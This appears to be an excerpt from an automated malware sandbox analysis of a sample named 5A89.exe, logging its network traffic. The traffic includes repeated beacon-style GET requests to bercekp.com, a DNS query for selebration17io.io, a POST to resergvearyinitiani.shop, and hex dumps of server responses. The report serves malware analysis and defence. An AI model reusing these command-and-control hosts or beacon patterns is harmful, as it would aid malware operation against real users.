                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: 5A89.exe, 00000008.00000002.3833746976.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: selebration17io.io
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: resergvearyinitiani.shop
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 52 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=R0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 39 bf 78 97 a6 a9 11 3b f6 52 dd e7 65 8e 1e 0d d3 13 3f 14 5b 63 17 9e 67 ac 9c cf 95 88 de af bc 62 a8 01 bd ec a9 95 32 96 d1 46 97 ea 13 19 80 03 92 61 c4 86 c5 54 53 7e 30 c6 1c 60 ae 6f 88 72 4b dd 54 f6 b8 1a 45 72 b6 ed f7 a2 3d bf 6c 13 d9 06 80 e3 a7 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 55 2b 98 c3 00 1f 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 12 52 c5 03 45 ca a1 61 7e de f5 45 af 19 17 7e 4f af 9a a5 74 d4 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 df 4a 9a 07 fd ec 31 dc 64 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 1d f2 d1 4f 6b 79 82 ae 9c a7 1c 4c 45 ae ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac c7 bc c4 55 25 af ba 68 b2 59 e2 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 b4 5f 40 db 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 29 97 aa 1b 6f d3 cb 29 32 32 fa 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 a7 d0 1f e4 a6 4d 0d 9f 10 8f d9 b0 99 19 84 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb 45 fa 17 28 d2 de 5b 1f d0 83 aa 7a 8f a2 76 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 ad 88 71 4a ba 80 7e 31 a6 70 d4 03 eb b2 98 76 6c 0f ca 82 b9 38 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 21 6f 11 18 3a 1d f8 8d a3 ae 88 c1 d4 bf 33 25 77 da a9 c3 90 d5 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 d9 3d fb d8 ea 94 62 97 52 b9 c5 ea 9e 13 c8 a6 4c 45 e5 f0 73 8d c1 c4 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 02 03 81 56 51 aa 5d 55 fe df 3c 42 66 98 de 9e 73 3f a8 65 a2 df 1f 78 60 be 2d 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 90 e9 f3 72 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 01 2e a8 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f c5 de fa e0 3d b8 71 cd 37 33 33 95 9f 33 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 01 25 5b fd 51 19 d0 37 1a 45 b1 15 22 18 cb 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b 15 ea ac 7b 1a 45 f7 ff 78 7d 17 db 14 91 3d 13 bf 1e e1 92 24 08 4f c5 03 a1 cb a1 61 7e de f5 69 69 5b 17 52 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 90 4a bf 72 34 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae dc ad 04 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 bf 24 3c 27 d4 39 b1 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 64 3c 43 40 77 eb c1 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 9c 18 5b d2 63 eb 96 48 90 b8 1b 6f f3 c3 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 eb bf 3a b0 9c 11 c0 af e4 1f e4 a6 2d 07 9f 10 bb d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 4a 7a 2b b7 6b 0b 78 21 1d 3c 28 d2 ce 51 1f d0 c9 81 7a 8f f0 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e 61 bc 70 d4 03 3b ee 98 76 72 0f ca 82 a1 0e 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 90 36 80 88 c1 34 e3 33 25 53 d3 a9 c3 62 e3 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 08 Feb 2024 18:08:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 cd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c6 13 dc 19 df 8c ca 70 73 dc 31 bc af 4f ed 7f 40 93 d9 5e 6f 71 00 76 b9 3b 50 fd 96 bf eb bf 3a fc bb c9 27 97 8f c8 d4 60 66 b0 06 bd 89 72 e9 ac 67 f3 40 ee e5 a4 78 ee 09 b5 8f 36 03 cf 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 bd 40 70 b1 5b 23 5c 4a 8a f4 e9 5a 15 21 0b 5a a3 06 93 3a b6 3f c8 01 28 bf 48 15 d7 d9 53 53 fa 79 1a 9e 1d 09 52 2b 05 50 83 7b 7e 55 f7 ff 78 8d 54 db c4 0d 53 13 bf 0e e1 92 24 0a 4f c5 06 a1 ca a1 61 7e de f5 6c b9 18 17 7e 5f af 9a a5 b4 cf a0 c1 bd dd 7a e8 2b 48 19 e2 2c d5 2c 18 1a e5 96 be 35 51 61 9a d4 2e 7c 88 38 c8 48 6b a1 c0 4a 8a 03 fd ec 9e aa 7b ac 87 2f bd 61 81 cf 5c bf ca 34 fd f8 12 8c 35 6c c9 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae cc 95 03 4c 69 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cd 46 e1 4a 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 06 f0 27 38 03 9b c7 9b 4f 06 3d 66 f1 9a 64 b1 1d ee 12 51 8c 74 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 6e a1 54 35 8b fc d3 7a 1b a2 cb 29 37 08 e7 5b 1e 54 aa 1e 26 61 11 ee c3 2c 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 6c 5e ae 43 75 81 7e 90 c7 7d 10 9f 30 1d dc b0 99 37 98 8a cd 70 7a 74 79 ae 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 7b 2f 08 64 5a b1 ae 46 1f 30 a0 aa 7a 8f 16 6d e3 cd d2 d9 37 00 12 e5 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 3e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 